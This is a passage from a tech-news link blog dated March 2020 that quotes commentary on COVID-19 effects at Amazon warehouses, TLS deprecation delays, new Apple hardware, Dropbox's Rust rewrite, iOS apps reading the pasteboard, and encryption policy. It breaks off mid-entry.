It may be the first of its kind in the facility, but it almost certainly won’t be the last. Even as companies encourage workers to stay home at the first sign of sickness for both their benefit and that of customers, many will no doubt come to work. And then there’s the matter of those who are largely asymptomatic.

Brian Fung and Sara Ashley O’Brien:

Amazon warehouses are facing a growing tide of coronavirus cases with at least 11 facilities hit so far, according to Amazon and local media reports.

[…]

Amazon has temporarily closed some sites, such as the Queens location, but has largely refrained from mass closures. The company told CNN that it is taking “extreme measures to ensure the safety of employees at our site[s].”

[…]

Amazon is witnessing spikes in demand that are comparable to the surge surrounding peak holiday periods such as Black Friday, Jay Carney, Amazon’s senior vice president of global corporate affairs, told CNN’s Poppy Harlow in an interview last week. In response, the company is ramping up hiring.

David Dayen (via Marina Epelman):

How has this filtered down to people like Tyler Hamilton, a worker at Amazon’s warehouse in Shakopee, Minnesota? He gets a couple more bucks an hour now, as Amazon raised its base pay to $17 to attract workers. And amid other complaints from Senators about hazard pay, on Sunday Amazon made overtime work double time instead of time and a half. “It helps, but to get the hazard pay you have to be there for 40 hours a week and the overtime,” said Hamilton, who has been organizing with The Awood Center, a community group that’s part of a larger grassroots coalition pressuring Amazon called Athena. “A lot of people are going to be there for longer. People will take as much OT as they can get, because we’re all poor.”

What Amazon gives with the overtime pay, then, comes at the expense of worker safety, which is nearly impossible to manage in the warehouse and delivery environments. The amount of people in warehouses and the workload makes physical distancing difficult. Amazon has put tape on the floor of Hamilton’s warehouse using a standard of maintaining a three-foot distance from co-workers, half of the recommended six-foot standard.

Josh Centers:

It’s safest and cheapest to wait at least 72 hours before handling or opening the package. While the virus dies off on cardboard in about 24 hours, it lives much longer on plastic. If the warehouse worker who packed the item or delivery person who dropped it off was infected, then there could be virus present not only on the cardboard or paper of the package, but on any plastic tape, labels, or inside the packaging.

If you choose to disinfect instead of waiting it out, use a cleaner from the EPA’s approved list.

You can use ultraviolet light to disinfect, but it’s complicated, expensive, and hard to recommend.

Josh Centers:

Today, the New York Times published an article attempting to refute mine (without mentioning my article, of course). Long story short, they’re telling people not to worry, which I think is highly irresponsible.

Monday, March 23, 2020

Chrome and Firefox Postpone Disabling TLS 1.0 and 1.1

Martin Brinkmann (via John Opdenakker, Hacker News):

Mozilla has re-enabled TLS 1.0 and 1.1 in the Firefox Stable and Beta browser; it is unclear when Mozilla did that but an update on the Firefox release notes page highlights why the protocols have been enabled again. Mozilla notes:

We reverted the change for an undetermined amount of time to better enable access to critical government sites sharing COVID19 information.

According to the update posted on the release notes page, Mozilla made the decision because some government sites still rely on the old protocols.

And the change “will be remotely applied to Firefox 74, which has already been shipped.”

Google (via Bugzilla):

Due to adjusted work schedules at this time, we are pausing upcoming Chrome and Chrome OS releases.

See also: Deprecation of Legacy TLS 1.0 and 1.1 Versions (tweet, Hacker News).

Previously:

Apple Mail’s Magic Mailboxes

Chris Hynes:

One of my proudest achievements on the team (and at Apple) was brainstorming with my team members and pushing an idea we internally called Magic Mailboxes and eventually became called Combined Mailboxes.

[…]

The 4 “combined mailboxes” (INBOX, Drafts, Sent, Trash) would get top billing, positioned at the top of the list, with unique and large icons to distinguish themselves

[…]

Clicking on any of the combined mailboxes would show the union of all the messages in all accounts

Flipping open a disclosure triangle on one of the combined mailboxes

Remember that drawer?

Previously:

Update (2020-03-27): See also: Hacker News.

Friday, March 20, 2020

Verifying Photo Locations

Kaveri:

Here’s an unexpected side effect of the pandemic - the water’s flowing through the canals of Venice is clear for the first time in forever. The fish are visible, the swans returned.

Eliot Higgins:

Because I’m a massive verification nerd who hates fun, here’s a little thread on geolocating these photos that people are claiming aren’t from Venice.

[…]

Now, let’s see if we can find another image, this one will be a little tougher as we’ve no bridge to help narrow down possible locations, so let’s see who can beat me to it.

[…]

So we’re looking for 3 building, painted orange, red, and pink in that order. Satellite imager isn’t much use, but Google Earth has 3D buildings, that allows you to look at a larger area than Street View allows all at once.

[…]

A quick Google of “ponte dei ferali venezia” brings up plenty of images that seem similar, but how do I know this isn’t just another very similar bridge? Well, I need to find close up photographs of the brickwork and other features and match it perfectly with the original image.

See also: Bellingcat’s Online Investigation Toolkit.

Previously:

Writing Command Line Interfaces for iOS Apps

Guilherme Rambo:

There are countless ways to go about creating a better environment for debugging and iteration while working in iOS apps, such as using launch arguments, environment variables, or having an internal settings or debug menu inside the app itself where you can tweak things. I believe every shipping app should include those, since they improve the development process significantly.

But even with all of those options available, I still think there’s room for one more: a command line interface. Yes, you read it correctly: I wrote a command line interface for my iOS app.

[…]

Thus, there needs to be a way to send data back and forth between a Mac and iOS devices (or the Simulator). There’s probably some way to do it using the wired lightning connection, we could also spin up a socket or HTTP server on the device, but I decided to use the MultipeerConnectivity framework.

Previously:

What Does the “Move To” Command Do in iWork?

Howard Oakley:

First, it surprises you by not adopting the standard human interface. Instead of the normal Save File dialog, as used by countless apps for a great many years, it drops down a small sheet offering in a popup menu to move the document to where it already is. In the spirit of novelty, as if intended to exemplify bad interface design, that popup lists a strange assortment of locations, of which only a few seem remotely appropriate. If you want a properly-designed purposeful dialog, you have to click on Other… right at the bottom to see a familiar Save File dialog.

[…]

What arrives at the destination is disappointingly exactly what you’d get from a regular Finder move: all saved versions are stripped from it. So unless you like this idiosyncratic interface, there seems no advantage in using it over a standard Finder move, and if you want a copy instead, then you’ll want to use the Finder anyway, once again accepting that you’ll lose access to all versions in the process.

Previously:

Thursday, March 19, 2020

Mac mini 2020

Tim Hardwick (Hacker News, Apple):

Apple today updated the Mac mini so that standard configurations now come with double the storage capacity.

The $799 configuration now comes with 256GB of PCIe-based SSD storage, while the $1,099 configuration features 512GB of storage as standard.

It’s great to see 256 GB SSDs move through the line—maybe iMac will finally get an SSD soon—but are there no new processors to use?

Previously:

Update (2020-03-27): Brian Stucki:

Confirmed: the updated Mac mini will still identify as “Late 2018” in software, etc.

The Growth of Command Line Options

Dan Luu (tweet):

We can see that the number of command line options has dramatically increased over time; entries tend to get darker going to the right (more options) and there are no cases where entries get lighter (fewer options).

[…]

If structured data or objects were passed around, formatting could be left to a final formatting pass. But, with plain text, the formatting and the content are intermingled; because formatting can only be done by parsing the content out, it's common for commands to add formatting options for convenience.

[…]

Over time, more convenience options have been added. For example, to pick a command that originally has zero options, mv can move and create a backup (three options; two are different ways to specify a backup, one of which takes an argument and the other of which takes zero explicit arguments and reads an implicit argument from the VERSION_CONTROL environment variable; one option allows overriding the default backup suffix). mv now also has options to never overwrite and to only overwrite if the file is newer.

Wednesday, March 18, 2020

MacBook Air 2020

Joe Rossignol (Apple, Hacker News):

Apple today updated its MacBook Air lineup with faster processors and graphics, a scissor switch Magic Keyboard, a lower starting price of $999, and more.

The new MacBook Air features Intel's latest 10th-generation Core processors, including up to a 1.2GHz quad-core Core i7 with Turbo Boost speeds up to 3.8GHz, resulting in up to two times faster performance compared to the previous generation. And with Intel Iris Plus Graphics, the new MacBook Air delivers up to 80 percent faster graphics performance.

A 256 GB SSD for $999 is a big improvement.

In retrospect, I kind of wish I had waited for this instead of buying a 16-inch MacBook Pro. I love the speed and the larger display, but the oversized trackpad and the Touch Bar annoy me on a daily basis.

Previously:

Update (2020-11-27): See also:

iPad Pro 2020 and Magic Keyboard With Trackpad

Mitchel Broussard (Apple, Hacker News):

Apple today introduced a new iPad Pro with a faster A12Z Bionic chip, a new Magic Keyboard accessory with a built-in trackpad, an Ultra Wide camera, a LiDAR Scanner, and more. In Apple’s description of the new tablet, it calls it “faster and more powerful than most Windows PC laptops.”

[…]

The new LiDAR Scanner measures the distance to surrounding objects up to 5 meters away, and enables advanced experiences with augmented reality on the iPad Pro. Apple said this means that ARKit apps on the new iPad Pro will get improved motion capture and people occlusion, leading to AR experiences “never before possible.”

Lastly, Apple is adding trackpad support to iPadOS 13.4 and the new Magic Keyboard. This new accessory attaches magnetically to iPad Pro and includes a floating design that works well on both a lap or a desk. The Magic Keyboard features cantilevered hinges for smooth adjustments of the viewing angle up to 130 degrees, including a full-size keyboard with backlit keys and a scissor mechanism that delivers 1mm travel.

The cursor and trackpad support look great, though I’m not tempted at all to use this instead of a Mac.

The keyboard for the iPad Pro costs more ($349) than the regular iPad itself ($329), but there are also Logitech ones.

See also Federico Viticci (tweet), Ben Lovejoy, Craig Federighi’s demo.

Previously:

Update (2020-11-27): Markus Müller-Simhofer:

When the physical Escape key returned with the 16” MBP I was sure it would follow on iPad. Sadly it's still missing. When stuck in a mode (e.g. accidental drag operation) it’s such a relieve that you can press it and no harm is done.

See also:

Tuesday, March 17, 2020

Understanding Combine

Joseph Heck:

For anyone keeping up with #combine, @mattneub has published Understanding Combine online, first glance looks like a great tutorial with a lot of depth[…]

Previously:

Rewriting Dropbox’s Sync Engine in Rust

Sujay Jayakar:

Rewriting the sync engine was really hard, and we don’t want to blindly celebrate it, because in many environments it would have been a terrible idea. It turned out that this was an excellent idea for Dropbox but only because we were very thoughtful about how we went about this process. In particular, we’re going to share reflections on how to think about a major software rewrite and highlight the key initiatives that made this project a success, like having a very clean data model.

[…]

There were few consistency guarantees, and we’d spend hours debugging issues where something theoretically possible but “extremely unlikely” would show up in production. Changing the foundational nouns of a system is often impossible to do in small pieces, and we quickly ran out of effective incremental improvements.

[…]

Rust has been a force multiplier for our team, and betting on Rust was one of the best decisions we made. More than performance, its ergonomics and focus on correctness has helped us tame sync’s complexity. We can encode complex invariants about our system in the type system and have the compiler check them for us.

[…]

The Control thread is designed to be entirely deterministic when its inputs and scheduling decisions are fixed. We use this property to fuzz it with pseudorandom simulation testing.

[…]

We redesigned the client-server protocol to have strong consistency. The protocol guarantees the server and client have the same view of the remote filesystem before considering a mutation. Shared folders and files have globally unique identifiers, and clients never observe them in transiently duplicated or missing states. Finally, folders and files support O(1) atomic moves independent of their subtree size.

Previously:

Update (2020-03-27): Sujay Jayakar:

  1. we write almost all of our logic on a single thread, using futures to multiplex concurrent operations on a single thread. then, we make sure all of the code on that thread is deterministic with fixed inputs. there’s lots of ways code can sneak in a dependency on a global random number generator or time.

  2. have traits for the interfaces between the control thread and other threads. we also mock out external time behind a trait too.

  3. then, wrap each real component in a mock component that pauses all requests and puts them into a wait queue.

now, instead of just calling .wait on the control thread future, poll it until it blocks (i.e. returns Async::NotReady). this means that the control thread can’t make any progress until some future it’s depending on completes. then, we can look at the wait queues and psuedorandomly unpause some subset of them and then poll the control thread again. we repeat this process until the test completes.

all of these scheduling decisions are made psuedorandomly from a fixed RNG seed that’s determined at the beginning of the test run. we can also use this seed for injecting errors, generating initial conditions, and “agitating” the system by simulating other concurrent events. the best part is that once we find a failure, we’re guaranteed that we can reproduce it given its original seed.

in fact, we actually don’t even log in CI at all. we run millions of seeds every day and then if CI finds a failure, it just prints the seed and we then run it locally to debug.

iOS Apps Snooping on Pasteboard Data

Talal Haj Bakry and Tommy Mysk (via MacRumors):

This article provides an investigation of some popular apps that frequently access the pasteboard without user consent. These apps range from popular games and social networking apps, to news apps of major news organizations. We found that many apps quietly read any text found in the pasteboard every time the app is opened. Text left in the pasteboard could be as simple as a shopping list, or could be something more sensitive: passwords, account numbers, etc.

[…]

The method is simple: Once we connect and pair the devices with Xcode, we can read the system log of the device. Fortunately, all pasteboard events are clearly logged.

[…]

We include any app that requests and reads the content of the system-wide pasteboard every time it’s opened, and consider it to be highly suspicious. There are games and apps that do not provide any UI that deals with text, yet they read the text content of the pasteboard every time they’re opened.

Nick Heer:

Most apps do not breach user trust in this manner, so it is surprising to see the breadth of very popular apps that are doing so in this case — many of which have no practical reason for reading pasteboard data in the first place. It’s the kind of thing that makes me wonder if they are all, perhaps, using a shared development framework or analytics bundle.

One way to resolve this may be to require consent from the user before the app can access the pasteboard. That consent can be provided in the form of the user tapping the paste button, upon which point the app is authorized.

Just because I once pasted something into an app doesn’t mean I want it to have ongoing access to read the pasteboard. Yet I don’t want to be prompted for each and every access, either. This seems like another case where it would be helpful for the system to maintain an audit log of what each app was doing.

Previously:

Microsoft Plots the End of Visual Basic

.NET Team:

We are supporting these application types to provide a good path forward for the existing VB customer who want to migrate their applications to .NET Core. This allows Visual Basic customers to take advantage of new platform features like side-by-side deployment, cross platform support, performance and new API improvements.

One of the major benefits of using Visual Basic is that the language has been stable for a very long time. The significant number of programmers using Visual Basic demonstrates that its stability and descriptive style is valued. Going forward, we do not plan to evolve Visual Basic as a language. This supports language stability and maintains compatibility between the .NET Core and .NET Framework versions of Visual Basic. Future features of .NET Core that require language changes may not be supported in Visual Basic. Due to differences in the platform, there will be some differences between Visual Basic on .NET Framework and .NET Core.

Paul Thurrott (via Hacker News):

When Microsoft released the .NET version of Visual Basic, originally called Visual Basic .NET, alongside C# at the beginning of the .NET era, the two languages were evolved together and had roughly identical feature sets. But this changed over time, with professional developers adopting C# and many fans of classic VB simply giving up on the more complex but powerful .NET versions of the environment. Today, virtually all of Microsoft’s relevant developer documentation is in C# only, with VB source code examples ever harder to find.

[…]

What this means to VB developers is that they might be able to bring their existing codebases forward to .NET Core or, soon, to .NET 5.0, which will replace both the traditional .NET and the open-source and cross-platform .NET Core when it’s released in late 2020. The issue is that not all legacy technologies will be supported going forward, so developers using WebForms, Workflow, or Windows Communication Foundation (WCF) will need to stick with classic .NET. Those applications will continue to work and be supported until the underlying Windows versions are retired; classic .NET support life cycles are tied to the Windows versions on which they were initially deployed.

Previously:

Monday, March 16, 2020

Microsoft Acquires npm

Nat Friedman (Hacker News):

I’m excited to announce that GitHub has signed an agreement to acquire npm.

[…]

For the millions of developers who use the public npm registry every day, npm will always be available and always be free.

[…]

The JavaScript ecosystem is massive and growing quickly. It needs a rock-solid registry. We will make the investments necessary to ensure that npm is fast, reliable, and scalable.

[…]

Looking further ahead, we’ll integrate GitHub and npm to improve the security of the open source software supply chain, and enable you to trace a change from a GitHub pull request to the npm package version that fixed it.

Working From Home Temporarily

Glenn Fleishman:

Suddenly asked or told to work from home—and never done so regularly before? I wrote a 55-book last week, Take Control of Working from Home Temporarily. It’s free and now available. Packed with tips on setting up a space, setting boundaries, & much more[…]

See also: Rui Carmo, David Sparks, Upgrade.

Previously:

Update (2020-03-27): See also: John Gruber, Shawn Blanc, Justin Searls.

The Pace of macOS Updates

Jason Snell:

My friend and former Macworld colleague Rob Griffiths keeps a record of macOS releases, which is exactly the kind of thing I’d expect from the guy who created Mac OS X Hints. Prodded by Stephen Hackett, who is apparently now the official Six Colors Chart Muse, I’ve decided to use Rob’s data to take a look at how often Apple updates macOS.

In terms of total updates released during the lifespan of a major version, Mac OS X 10.4 Tiger and macOS 10.13 High Sierra share the crown with 12. However, High Sierra was only the “current” version of macOS for 385 days, while Tiger reigned for nearly three years. That means that Tiger actually was the version of macOS with the longest time between updates, at an average of one update for every 88 days of release.

I think the most important part for quality is not the number of updates but the time between major releases. Snow Leopard lasted almost 2 years.

Bill Gates Leaves Microsoft’s Board

Microsoft (via Hacker News):

Microsoft Corp. today announced that Co-Founder and Technology Advisor Bill Gates stepped down from the company’s Board of Directors to dedicate more time to his philanthropic priorities including global health, development, education, and his increasing engagement in tackling climate change. He will continue to serve as Technology Advisor to CEO Satya Nadella and other leaders in the company.

On June 27, 2008, Gates transitioned out of a day-to-day role in the company to spend more time on his work at the Bill & Melinda Gates Foundation. He served as Microsoft’s chairman of the board until February 4, 2014.

Previously:

Friday, March 13, 2020

ViDL 1.0.2

Ole Zorn (tweet):

ViDL is a free Mac app that allows you to easily download videos from YouTube and hundreds of other websites for offline viewing.

It is based on the popular youtube-dl command line tool, but much easier to use, especially with videos/playlists that require a login (like your personal “Watch Later” list).

See also: Downie.

Previously:

Update (2020-03-27): See also: Josh Centers, Softorino YouTube Converter 2.

TJ Luoma:

As promised, here’s a write-up on how I use iOS Shortcuts to save an URL to Dropbox and have Downie download a video.

Eight Major Releases Later, Sandbox File Limit Bug Remains

Gus Mueller:

The other question I always ask [at WWDC labs]: Is the kernel resource leak for bookmarks in sandboxed applications finally fixed? I’d sure like to put Retrobatch in the app store this year, but this bug means it can only process so many images before it fails and requires a reboot…

Erik Schwiebert:

I was talking to an Apple engineer recently about this problem as it affects Office, Gus. He mentioned you and Retrobatch specifically as a known case that they have yet to address. He said he would prod engineering to look at it.

Daniel Jalkut:

This is a vexing bug that has affected MarsEdit for years, as well.

Gus Mueller:

It’s also a different limit for every Mac configuration, as explained to me by Apple engineers.

Previously:

Update (2020-03-27): Michael Buckley:

The App Store version of Transmit works around this by prompting users to grant access to their entire home folder. Users have to tap a button, then we open an NSOpenPanel with setCanChooseDirectories. Users then have to correctly open their home folders.

The kernel seems smart enough to track file permissions at the highest possible level. Try to open 1000 files in a folder, you get 1000 entries in kernel memory. Open the folder first, and you only get 1 entry.

Sparkle Project Needs Help

Kornel (via Vadim Shpakovski):

I don’t have enough energy to give this project attention it needs. I’m also mostly developing in Rust these days, so Sparkle doesn’t “scratch my itch” any more.

This project is quite important for security and health of non-walled-garden apps for macOS.

I need your help in getting Sparkle 2 out of the door.

Update (2020-03-27): Graham Miln:

I open sourced our updater. It takes a different approach to Sparkle – being based on packaged installs. Works well with sandboxing.

Update (2020-04-08): Squirrel:

Squirrel is an OS X framework focused on making application updates as safe and transparent as updates to a website.

Instead of publishing a feed of versions from which your app must select, Squirrel updates to the version your server tells it to. This allows you to intelligently update your clients based on the request you give to Squirrel. The server can remotely drive behaviors like rolling back or phased rollouts.

WWDC 2020 to Be Online-only

Apple (via Phil Schiller, Hacker News, MacRumors):

“We are delivering WWDC 2020 this June in an innovative way to millions of developers around the world, bringing the entire developer community together with a new experience,” said Phil Schiller, Apple’s senior vice president of Worldwide Marketing. “The current health situation has required that we create a new WWDC 2020 format that delivers a full program with an online keynote and sessions, offering a great learning experience for our entire developer community, all around the world. We will be sharing all of the details in the weeks ahead.”

Thursday, March 12, 2020

Is That Twitter Follower Fake?

NixIntel (via Dan Moren):

This Person Does Not Exist is a website that uses AI to generate random but realistic looking faces. It’s a great tool and has become a popular way of generating fake profiles for sock puppet accounts, but it is not without its limitations. There are a number common flaws and features in TPDNE-generated images that means it’s possible to spot them.

[…]

A common feature of TPDNE images is that the eyes and mouth of the person are always in exactly the same place in the picture. The eyes are always the same distance apart and centred in the same place. The mouth is always about one quarter of the way up from the bottom of the image and is also always centred. This occurs regardless of the angle of their head and can sometimes make for quite unusual looking faces.

[…]

TPDNE only creates a single image of a person, so if the person truly does not exist, we should never be able to find any image of them other than the fake one where they are staring directly at the camera.

Previously:

TLS Increasingly Exists in Three Different Worlds

Chris Siebenmann:

The first world is web TLS, which is dominated by browsers. This is the familiar world of public HTTPS, with public Certificate Authorities, requirements for certificate transparency, and so on. The browsers increasingly are calling the shots here and they’re pushing for things like short certificate lifetimes, aggressively moving away from old TLS versions, and so on.

[…]

The second is non-web public TLS, where TLS is used for protocols like IMAP, SMTP (with STARTTLS), and so on. This world still uses public CAs, but it has a lot more old clients and servers and is a lot slower to deprecate old TLS and SSL versions, move to shorter certificate lifetimes, and so on.

[…]

The third world is internal TLS, where TLS is used inside an organization or a service to encrypt connections and often to authenticate them (and sometimes it’s used between organizations).

Previously:

Oracle Responds to Java API Copyright Amicus Briefs

Ken Glueck, Oracle VP:

As we discussed in a previous post, this case is not about innovation, it is about theft. Google copied verbatim more than 11,000 lines of software code, and now attempts post hoc to change the rules in order to excuse its conduct. Any objective view of technological innovation during the pendency of this matter leads to the conclusion that strong copyright promotes innovation. The Federal Circuit decided in 2014 that Oracle’s Java copyrights were valid and enforceable and the period since 2014 has seen some of the greatest advances in technology.

[…]

Google has mastered the art of curating an atmosphere to support its views, spending well over $100 million over the past decade to create its echo-chamber. While Google’s approach is generally well understood, this case is the first time its artificial ecosystem was brought to bear at the Supreme Court, so we thought a little sunshine would help along the way.

We will admit to surprise when we saw the headline that 26 briefs were filed on Google’s behalf. Google attempted to create a narrative that tech supports Google’s position, and we already made the point that tech is clearly not supporting Google’s views.

Joshua Bloch (Hacker News):

In a corporate blog yesterday, Oracle attacked 83 computer scientists (including 13 Turing Award winners) who signed an amicus brief defending our right to reimplement APIs, on the grounds that some of us accepted research grants from Google.

This is nonsense. For example, Doug Lea—who is in in no small measure responsible for Java’s success—accepted one small grant from Google fourteen years ago, and promptly doled it out to deserving undergrads who were testing java.util.concurrent. Have you no shame, Oracle?

We are not Google shills. We are scientists and engineers. Some of us laid the theoretical groundwork for the profession, some designed the computers you grew up on, and some wrote the software you use every day.

We depend on the right to reimplement each others’ APIs, and we are truly afraid that your irresponsible lawsuit may deprive us of that right, which we’ve enjoyed throughout our long careers.

[…]

Amusingly, one of the APIs Oracle is accusing Google of infringing is Java’s reimplementation of the Perl 5 regex API ( @MadbotMcCloskey did the work, and I helped a bit). You can’t make this stuff up.

Previously:

How (Some) Good Corporate Engineering Blogs Are Written

Dan Luu:

On the other hand, companies compete relatively directly when recruiting, so being more compelling relative to another company has value to them; replicating the playbook Cloudflare or Segment has used with their engineering “brands” would be a significant recruiting advantage. The playbook isn’t secret: these companies broadcast their output to the world and are generally happy to talk about their blogging process.

Despite the seemingly obvious benefits of having a “good” corp eng blog, most corp eng blogs are full of stuff engineers don’t want to read. Vague, high-level fluff about how amazing everything is, content marketing, handwave-y posts about the new hotness (today, that might be using deep learning for inappropriate applications; ten years ago, that might have been using “big data” for inappropriate applications), etc.

To try to understand what companies with good corporate engineering blog have in common, I interviewed folks at three different companies that have compelling corporate engineering blogs (Cloudflare, Heap, and Segment) as well as folks at three different companies that have lame corporate engineering blogs (which I’m not going to name).

Wednesday, March 11, 2020

Awesome macOS Command Line

Marcel Bischoff (via Isle of the Kakapo):

A curated list of shell commands and tools specific to OS X.

“You don’t have to know everything. You simply need to know where to find it when necessary.” (John Brunner)

Previously:

Update (2020-03-12): Matt Reagan:

You might also check out Bash Snippets… It’s a short, curated list of macOS command-line tips and commands I’ve found useful in the past.

Update (2020-04-17): See also: Apple’s list of Keyboard shortcuts in Terminal on Mac (via Marnin).

Update (2022-12-14): See also: Hacker News.

Reverting From Apple News Format to RSS

Federico Viticci:

If you use News, our @macstoriesnet channel is back to being a standard RSS one. Performance of the Apple News Format plugin for WordPress was horrible and not worth our time improving it. Luckily, News Support reverted us to the old system quickly.

Wow, I didn’t think reverting was even possible. The WordPress plug-in has been working OK for me, but it probably wasn’t worth all the effort to set it up and customize it. I had heard that using Apple News Format would cause the app to drive more traffic to my articles, but nearly two years later the analytics show that almost no one is finding my posts via Apple News. Twitter, RSS, searches, and random links from the Web are all far more effective.

Previously:

Explaining Copyright Broke the YouTube Copyright System

NYU (via Hacker News):

This is a story about how the most sophisticated copyright filter in the world prevented us from explaining copyright law. It doesn’t involve TikTok dance moves or nuanced 90s remixes featuring AOC. No, it involves a debate at a law school conference over how and when one song can infringe the copyright of another and how exactly one proves in a courtroom if the accused song is “substantially similar” enough to be deemed illegal. In the end, because it was blocked by one of the music companies who owns the song, it also became a textbook study in how fair use still suffers online and what it takes to pushback when a video is flagged. A copyright riddle wrapped up in an algorithmic enigma, symbolic of the many current content moderation dilemmas faced by online platforms today.

Previously:

my brother tried to stream a violin recital from his living room on Facebook Live and […]

Apparently this recording by this particular “artist” isn’t a song at all, but just an upload of that same washing machine jingle that’s been on YouTube for nearly a decade. So, some rando records his washing machine jingle, uploads it to YouTube, then registers it with ContentID, and goes around demonetizing other YouTube videos where the jingle plays. And, because of how ContentID is policed — or not —, none of this is caught by anyone at all.

Tuesday, March 10, 2020

Saving Audion Faces

Cabel Sasser:

Apple removed resource forks/PICT support in Catalina so we’re on the absolute edge of being able to rescue Audion faces from displaying easily ever again.

Michael Buckley:

[Audion faces are] an important part of Panic’s history that has been inaccessible to modern computing devices for well over a decade. Although they were cutting-edge technology when Audion launched 21 years ago, porting them to modern Web browsers was an involved process.

[…]

Les’s converter was mostly complete. It could already open resource files, extract images and their coordinates, and convert images from the PICT image format to PNG, an image format in wide use today. However, the code needed to be updated to run on modern versions of macOS. It used a few functions which have been removed from macOS since the converter was written.

[…]

However, HTML’s <canvas> element offers very little control over text rendering, and each Web browser draws the text differently. If you used Audion back in the day, the text on the page will not look exactly like you remember.

The second problem is that many Audion faces used custom fonts, and some of these fonts have been difficult to convert for the Web. Mac Postscript fonts also stored their font data in resource forks, and although there are many tools to convert these fonts to other formats, these tools fail to convert some of these fonts correctly.

See also: Audion & On on the new Panic podcast:

How did a fierce competition with a rival lead Steven Frank and Cabel Sasser to make a life-changing decision in a meeting with one of their biggest idols… and one of their arch nemeses? Plus: community and the cascading effects of the choices we make, 23 years later.

Previously:

Vanishing MacBook Pro Ports

Jason Snell:

This chart covers the era of 15-inch laptops, from the original Titanium PowerBook G4 in 2001, and also includes the 16-inch MacBook Pro (2019). I chose the last top-of-the-line 15-inch laptop to be released in a given year, and no, I didn’t include any bigger or smaller laptops.

Witness the rise and fall of Apple laptop ports, which peaked at 11 with the 2003-2005 MacBook Pros and has reached an all-time low the past four years with five[…]

Jernej Virag:

My new 13" Razer laptop has both TB3 USB-C ports and USB-A ports. Hard to describe how much less annoying it is to actually connect it to things compared to a Mac.

Nick Heer:

While neither an ExpressCard or SD Card slot are ports, per se, I think the removal of those connection options is also noteworthy.

As is the removal of the optical drive.

Google’s Software-based 3D Touch

Dieter Bohn:

But there was one line on Google’s support page for the update that caught my eye (emphasis mine): “In addition to long press, you can now firmly press to get more help from your apps more quickly.”

“Firmly press” sets off alarm bells because it sounds a lot like the iPhone’s 3D Touch, which enables different actions depending on how hard you press on the touchscreen.

[…]

But now, it seems that Google has done the same thing for the touchscreen that it does with the camera: use its software algorithms to make commodity parts do something special.

[…]

Essentially, this new feature lets you press harder to bring up long-press menus faster. In fact, Google’s documentation for Android’s Deep Press API explicitly says it should never do a new thing, it should only be a faster way to execute a long press.

Via Nick Heer:

As of last year, the hardware-based version of 3D Touch no longer exists; new iPhones do not have the component that registers touch pressure, and iPads never did. It’s kind of interesting that Google decided that now was an ideal time to replicate in software the ability to detect pressure — something which, as far as I can figure out, iOS does not do.

Previously:

Let’s Encrypt Vulnerability

Jim Salter (via Bruce Schneier):

On Leap Day, Let’s Encrypt announced that it had discovered a bug in its CAA (Certification Authority Authorization) code.

The bug opens up a window of time in which a certificate might be issued even if a CAA record in that domain’s DNS should prohibit it. As a result, Let’s Encrypt is erring on the side of security and safety rather than convenience and revoking any currently issued certificates it can’t be certain are legitimate[…]

See also: Let’s Encrypt.

Previously:

Monday, March 9, 2020

Apple Changes iPhone Cleaning Guidelines

Juli Clover:

Apple today updated its support document on cleaning Apple products with new information that confirms it’s okay to to use a 70 percent isopropyl alcohol wipe or Clorox Disinfecting Wipes for the purpose of cleaning germs from your devices.

Prior to now, Apple’s cleaning guidelines have recommended against all cleaners, warning that the chemicals have the potential to damage the oleophobic coating on iPhone and iPad displays. Apple still warns against aerosol sprays, ammonia, window cleaners, hydrogen peroxide, bleach, compressed air, and abrasives[…]

I’m not sure what to make of this. I followed the link, and it leads to a page that was last updated in September 2019 and still recommends only using water. It also omits the iPhone XR.

Joanna Stern:

Turns out, we’ve been living an iPhone-cleaning lie.

After years of being told we cannot—and should not—clean our phones with disinfecting wipes, Apple now says you can. My extensive testing over the last few days proves the same.

Was Apple just being overly cautious before (or didn’t test with anything else)? Or are the newer oleophobic coatings better?

I also wonder whether it is possible to accurately test this over just a few days.

Previously:

Update (2020-03-09): Tanner Bennett notes that if you add ?mod=article_inline part to the first link, you get the same page but with an extra note in a box:

Is it OK to use a disinfectant on my Apple product?

Using a 70 percent isopropyl alcohol wipe or Clorox Disinfecting Wipes, you may gently wipe the hard, nonporous surfaces of your Apple product, such as the display, keyboard, or other exterior surfaces. Don’t use bleach. Avoid getting moisture in any opening, and don’t submerge your Apple product in any cleaning agents. Don’t use on fabric or leather surfaces.

Update (2020-03-27): Howard Oakley:

If the Coronavirus is going to die when left alone outside the body, why don’t we just leave surfaces alone and wait for that to happen? We can, and in many circumstances will do so, but that entails leaving possibly contaminated objects for several days, best at least a week, before anyone can touch them again. So in most circumstances, you’re going to want to disinfect things like keyboards, trackpads, mice, touchscreens, etc., rather than seal them away with big yellow-and-black warning signs attached.

Folding@home

Josh Centers:

If you’re looking for a new distributed computing project to join (calling Bob Lauterbach), the 20-year-old Folding@home project is still going strong. Folding@home is dedicated to “understanding protein folding, the diseases that result from protein misfolding and aggregation, and novel computational ways to develop new drugs in general.”

In addition to cancer, Alzheimer’s, Huntington’s, and Parkinson’s, Folding@home is tackling a disease that has been dominating the headlines: COVID-19. Your contributions could help researchers find a treatment.

Previously:

Update (2020-03-27): Dominik Wagner:

Fun Fact: I’m actually running windows on an iMac to be able to contribute to the #COVID19 @foldingathome projects, as they are all GPU only right now and no GPU support on macOS currently.

Samsung vs. iPhone

Benjamin Mayo:

10 years ago today, Samsung made this slide deck detailing 126 things the iPhone OS did better than the original Samsung Galaxy S operating system.

Rene Ritchie:

The Galaxy Note 10 is here. I spoke all about it with Daniel Bader from Android Central, so be sure to check that video out if you haven’t already. Now, I want to talk about the feature from the Note 10 I’d love to see Apple bring to the iPhone […]

Juli Clover:

In our latest YouTube video, we go hands-on with the Note 10+ to check out what Samsung has added to try to compete with the iPhone lineup.

Previously:

Trying to Weaken Encryption Again

The New York Times:

Attorney General William Barr and his British and Australian counterparts are set to push Facebook for a back door to its end-to-end encryption on WhatsApp and other messaging platforms, which would give investigators access to now-secret communication

Matthew Green:

If there’s any surprise in the Barr letter, it’s not the government’s opposition to encryption. Rather, it’s the new reasoning that Barr provides to justify these concern. In past episodes, law enforcement has called for the deployment of “exceptional access” mechanisms that would allow law enforcement access to plaintext data. As that term implies, such systems are designed to treat data access as the exception rather than the rule. They would need to be used only in rare circumstances, such as when a judge issued a warrant.

The Barr letter appears to call for something much more agressive.

Rather than focusing on the need for exceptional access to plaintext, Barr focuses instead on the need for routine, automated scanning systems that can detect child sexual abuse imagery (or CSAI).

John Gruber:

